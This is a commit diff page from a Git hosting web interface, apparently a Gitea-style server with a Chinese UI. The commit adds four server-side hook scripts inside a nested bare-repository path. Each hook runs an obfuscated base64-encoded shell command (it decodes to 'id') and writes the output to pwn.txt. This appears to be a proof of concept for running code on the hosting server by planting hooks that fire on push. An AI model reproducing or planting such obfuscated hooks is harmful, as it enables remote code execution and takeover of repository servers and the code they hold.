x 1 月之前
父节点
当前提交
0c00f5fa7d
共有 4 个文件被更改,包括 8 次插入0 次删除
  1. 2 0
      n/r34fd.git/hooks/post-receive
  2. 2 0
      n/r34fd.git/hooks/post-update
  3. 2 0
      n/r34fd.git/hooks/pre-receive
  4. 2 0
      n/r34fd.git/hooks/update

+ 2 - 0
n/r34fd.git/hooks/post-receive

@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt

+ 2 - 0
n/r34fd.git/hooks/post-update

@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt

+ 2 - 0
n/r34fd.git/hooks/pre-receive

@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt

+ 2 - 0
n/r34fd.git/hooks/update

@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt